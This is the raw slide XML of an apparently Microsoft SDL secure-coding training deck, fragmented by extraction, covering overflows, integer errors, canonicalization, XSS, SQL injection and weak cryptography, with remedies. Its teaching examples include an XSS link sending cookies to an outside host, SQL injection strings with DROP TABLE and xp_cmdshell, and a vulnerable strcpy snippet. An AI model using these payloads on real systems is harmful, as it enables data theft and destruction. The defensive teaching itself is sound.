5C-FFB0-45CB-A0E4-806F6D9FD0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8AA757-7B8A-4E28-B0CB-9C88821D79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0C85FC-2389-4B2C-8054-564C3518CA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4332C-D19E-44A4-9451-660D9F9A21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2349A0-9589-44E5-B5CF-010EE88AAB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DF820F-EDD4-4974-8B13-B64C317174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A147C-D7CD-4099-BC9B-98E5BD0959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5C883D-591C-4151-AE5D-898B458F5AC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02FF47-6138-40F6-AB88-C5133B1ADD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2E4B7-00C3-4E20-8534-480061B3F5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A757EF-9C93-49A8-8B9A-920549A67C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55E68C-FE80-49B7-99F0-12573C706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02A6E6-C796-422D-BD11-F26ECD8676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07D921-49F2-46DA-876E-E2B52CFA1B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739238-CDF2-4357-858D-BD578B6579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62D9B7-3593-406A-BDB5-9DB04F961E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E9DD4-2E87-4252-89F3-AF027F355C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87DED-8C8A-4419-A7B5-A74E34DBD0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DA74B5-13C7-4539-A9B5-C584590148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631194-37BD-4C49-89E3-6A078258F0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03DD07-EE5A-4FD1-B6D5-094449D919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FD589C-DC14-493D-9D2F-C7C38DE94D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hyperlink" Target="http://www.microsoft.com/mspress/books/10723.asp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Buffer Overflow Remedies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47DF8-13C9-49E7-9ABF-80BA066BB02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Integer Arithmetic Errors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Integer Arithmetic Errors:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> A generic name for a set of common integer arithmetic mistakes that can lead to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Integer overflows/underflows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Signed versus unsigned errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trunction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> All can lead to buffer overflow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5188B-B148-44A9-A8C1-C1166BCA7F2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Integer Arithmetic Error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Example(char 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// Check to make sure size is ‘valid’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 (size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// Should be safe to copy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buf,str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631B-D46A-440C-A09E-D412765FA55D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Integer Arithmetic Error Remedies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Closely examine any calculation used to determine an array offset or memory location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use unsigned variables for array indexes and buffer sizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Watch out for compiler errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>C4018 &amp; C4389 (signed/unsigned mismatch)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>C4288</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>#pragma casts that silence the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354A1-A34A-4B7D-AA95-25174FB1ADD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Canonicalization Issues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can be represented in different forms, but have the same meaning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Canonicalization Issues:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Occur when security checks look for one form of data, but not the one actually used by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Often used by malicious users to bypass weak security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E7BA4-00A1-4F42-A676-FC158A48E68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Canonicalization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1295400"/>
            <a:ext cx="45720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SecretFile.txt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SecretFile.txt.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Secret~1.txt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SecretFile.txt::$Data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3657600"/>
            <a:ext cx="6172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String FileName = System.Console.ReadLine();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if (FileName.ToLower().Equals(“secretfile.txt”))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	// deny access to file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// grant access to file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27EC2-A038-4CC0-86FC-4DBB4EB3710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4648200"/>
            <a:ext cx="2667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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if a malicious user specifies “Secret~1.txt” or “SecretFile.txt::$Data”?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Canonicalization Issue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Understand the final form of the data and make sure you are using that form for security checks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Avoid making security decisions based on names, let the operating system do the work for you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you do, then use regular expressions to restrict what is allowed in a name and validate based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>canonicalized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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8B2F7-C299-41C2-B4C8-1A48387E3D48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Cross-Site Scripting (XSS) Issues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Very common Web attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>An issue in a Web application that leads to a compromise of the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Occurs when user input is not validated and echoed back as part of Web responses.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A2675-7C8D-4C3B-BD87-34542145FC2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Cross-Site Scripting Example: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cookie Stealing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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332038" y="3224213"/>
            <a:ext cx="6346825" cy="1800225"/>
            <a:chOff x="1493" y="1919"/>
            <a:chExt cx="3998" cy="1134"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19472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01" y="1919"/>
              <a:ext cx="3390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3" name="Picture 31" descr="GEL-Bullet-Arrow-MS-re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93" y="2180"/>
              <a:ext cx="60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930650" y="1565275"/>
            <a:ext cx="5041900" cy="984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Welcome.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello,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&lt;%= request.querystring(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)%&gt;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-249238" y="5157788"/>
            <a:ext cx="9609138" cy="1319212"/>
            <a:chOff x="-167" y="3174"/>
            <a:chExt cx="6053" cy="1014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19470" name="Picture 19" descr="turquoise gradient rectangle with glo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67" y="3174"/>
              <a:ext cx="6053" cy="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1" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="273" y="3310"/>
              <a:ext cx="4365" cy="7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</a:rPr>
                <a:t>&lt;a href=http://www.insecuresite.com/welcome.asp?name=</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;script&gt;document.write</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 	(′&lt;img src=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>″</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>http://gotcha.com/″%2bdocument.cookie%2b&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>′</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/script&gt;here&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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327775" y="4343400"/>
            <a:ext cx="1625600" cy="3921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19463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5" y="1644650"/>
            <a:ext cx="33718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8150" y="3076575"/>
            <a:ext cx="194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634163" y="2557463"/>
            <a:ext cx="1350962" cy="939800"/>
            <a:chOff x="4179" y="1307"/>
            <a:chExt cx="851" cy="592"/>
          </a:xfrm>
        </p:grpSpPr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4550" y="1307"/>
              <a:ext cx="480" cy="261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19469" name="Picture 35" descr="Funny Guy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79" y="1323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" name="Picture 23" descr="ekufo2mp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08750" y="3281363"/>
            <a:ext cx="8985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9D502-E97B-4F5F-B9C9-1852835C093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Cross-Site Scripting Remedies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Validate all Web input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Never directly echo user input in Web responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encode all Web output that contains input (see System.Web.HttpUtility)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use HttpOnly cookie option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use &lt;frame&gt; security attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use built-in ASP.NET validateRequest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1E9CC-E735-4466-9A6F-35A01DCAA02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Secure Implementation Principles (Level 100)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0F006-559B-497C-8F14-D1606B2E11B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SQL Injection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Common and serious vulnerability especially for Web-based applications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Another problem due to lack of input validation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Allows malicious users to control SQL commands executed by the database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SQL Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Occurs when malicious data is inserted into strings that are later passed to a database engine for parsing or execution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BA54C-132A-4603-A7B8-38EDA2FADCD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83D37-085C-4B2B-A9C3-00489F48C6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295" y="1535373"/>
            <a:ext cx="8401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90600" y="4724400"/>
            <a:ext cx="72390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SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ShipmentOrders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WHERE ID = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;ID_ENTERED_BY_USER&gt;’;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6DD2E-82D6-425B-86FD-91EC6917D2B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6647" y="1486468"/>
            <a:ext cx="7239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SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ShipmentOrders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WHERE ID = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;ID_ENTERED_BY_USER&gt;’;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735238"/>
            <a:ext cx="807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#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ID = 1000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</a:rPr>
              <a:t>ShipmentOrders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE ID = ‘1000’;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10000"/>
            <a:ext cx="807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#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ID = 1000’; DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ShipmentOrders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;--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</a:rPr>
              <a:t>ShipmentOrders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE ID = ‘1000’;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DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ShipmentOrders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;--’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807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#3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ID = 1000’; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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;--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</a:rPr>
              <a:t>ShipmentOrders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE ID = ‘1000’;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exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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;--’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SQL Injection Remedies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Validate all input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use parameterized queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Consider allowing access to stored procedures (using parameterized queries) and no access to underlying tables</a:t>
            </a:r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C7AE8-331B-46DF-AAEE-B88F38928F7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Cryptographic Weaknesses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Cryptography: The process and study of hiding secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cryptography can be difficult to use properly in applications</a:t>
            </a:r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6BBC7-FDFE-4E0C-BA35-3FC781AF2B2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Top Common </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Cryptographic Mistakes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/>
              <a:t>Mistake #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: Storing secrets inside an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Application code cannot defend itself, therefore secrets inside source code is impossible to defend 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b="1" smtClean="0"/>
              <a:t>Mistake #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: Creating your own cryptographic algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>No assurance of algorithm robustness or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561AA-CEE4-426D-8603-8A245FCE13C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Remedies for Top Common Cryptographic Weaknesses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Microsoft SDL requires that applications store secrets using the Data Protection API (DPAPI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Easier access to platform cryptographic services and can be used to protect application secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use standard cryptographic algorithms found on Windows platforms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>.NET Framework:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> System.Security.Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Native Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> CryptoAPI, CAPICOM, CryptoAPI Next Generation (CNG)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4E4D0-134B-4FD0-A53F-C748B21E26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Beware, Not All Cryptographic </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Standards Are Safe!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Banned by Microsoft SDL for all new applications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MD4, MD5, RC4, DES, SHA1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Approved by Microsoft SDL for all new applications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Advanced Encryption Standard (AES) or Rijndael </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SHA 256 or higher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72AAE-7146-4FC5-BC60-9A4111533AF0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Microsoft SDL and Secure Implementation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Importance of input validation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Secure Implementation issues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Buffer Overruns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Integer Arithmetic Errors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Canonicalization Issues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Cross-Site Scripting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SQL Injection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Cryptographic Weaknesses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67712-D3A4-47EC-9D78-E7F8A9E5A49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8709B-8E63-4474-8313-BBF293F2311A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SDL and Secure Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Secure Implementation Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Common Secure Implementation Issues</a:t>
            </a:r>
          </a:p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E3CA7-DEFD-41A4-BEB2-0D0E5712AAA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31747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31805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06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31802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03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04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31800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01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51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31797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8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9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31794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5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6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31792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93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791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31788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89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787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56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31784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5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31782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3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31773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4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31780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81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31778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79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777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31770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1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2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31768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769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767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62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31763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31764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886C0-0ACA-455F-A430-E27ED00BC22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32773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2774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6BF1C-8583-4E02-96FB-1CCB84ECAE69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D0304-FD2A-4792-97C6-F7AFF903361E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26D7B-7103-4EB3-8720-982929714326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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="Diagram 16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Implementation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only two types of security implementation issues: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smtClean="0"/>
              <a:t>Input validation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smtClean="0"/>
              <a:t>Everything else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AAFB1-ACE6-4087-8783-68C253CD966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Input Validation Tips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“All input is evil, until proven otherwise”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Validate input that crosses trust boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Validate inputs against expected data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Range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C820B-A568-486E-B4DF-2F0686DA4D4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Buffer Overflows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Buffer Overflows:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Occurs when data is written to a destination buffer where the data being written is larger than the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Examples: SQL Slammer worm, Zotob worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Most common in native applications (rare but still possible in managed code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cause is failing to validate input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can occur on application stacks and heaps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2151C-911E-4E5E-914F-761AA5FD32F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Stack Overflows at Work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527425" y="4208463"/>
            <a:ext cx="4303713" cy="2070100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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0" y="2438398"/>
            <a:ext cx="5811838" cy="685800"/>
            <a:chOff x="678" y="1484"/>
            <a:chExt cx="3661" cy="432"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill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8" y="1484"/>
              <a:ext cx="98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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Buffers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65" y="1484"/>
              <a:ext cx="98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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Other vars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rot="5400000" flipH="1">
              <a:off x="2610" y="1525"/>
              <a:ext cx="432" cy="3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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>EBP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5400000" flipH="1">
              <a:off x="2962" y="1525"/>
              <a:ext cx="432" cy="3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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>EIP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51" y="1484"/>
              <a:ext cx="98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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Args</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9221" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3509963" y="4259263"/>
            <a:ext cx="3906837" cy="20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void func(char *p, int i) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int j = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  CFoo foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int (*fp)(int) = &amp;func;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char b[128];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strcpy(b,p);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09700" y="3144838"/>
            <a:ext cx="2451100" cy="2763837"/>
            <a:chOff x="888" y="1786"/>
            <a:chExt cx="991" cy="1718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891" y="3504"/>
              <a:ext cx="9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888" y="1786"/>
              <a:ext cx="0" cy="171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 rot="5400000">
            <a:off x="5787232" y="3158331"/>
            <a:ext cx="207962" cy="2136775"/>
            <a:chOff x="1612" y="2932"/>
            <a:chExt cx="114" cy="501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1612" y="2932"/>
              <a:ext cx="11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1615" y="3433"/>
              <a:ext cx="11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617" y="2942"/>
              <a:ext cx="0" cy="4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019425" y="3113088"/>
            <a:ext cx="815975" cy="2530475"/>
            <a:chOff x="1902" y="1766"/>
            <a:chExt cx="514" cy="1602"/>
          </a:xfrm>
        </p:grpSpPr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1910" y="3130"/>
              <a:ext cx="38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304" y="2880"/>
              <a:ext cx="112" cy="488"/>
              <a:chOff x="1736" y="2880"/>
              <a:chExt cx="112" cy="488"/>
            </a:xfrm>
          </p:grpSpPr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H="1">
                <a:off x="1736" y="2880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H="1">
                <a:off x="1736" y="3368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1736" y="2880"/>
                <a:ext cx="0" cy="48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1902" y="1766"/>
              <a:ext cx="0" cy="135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5541963" y="3141663"/>
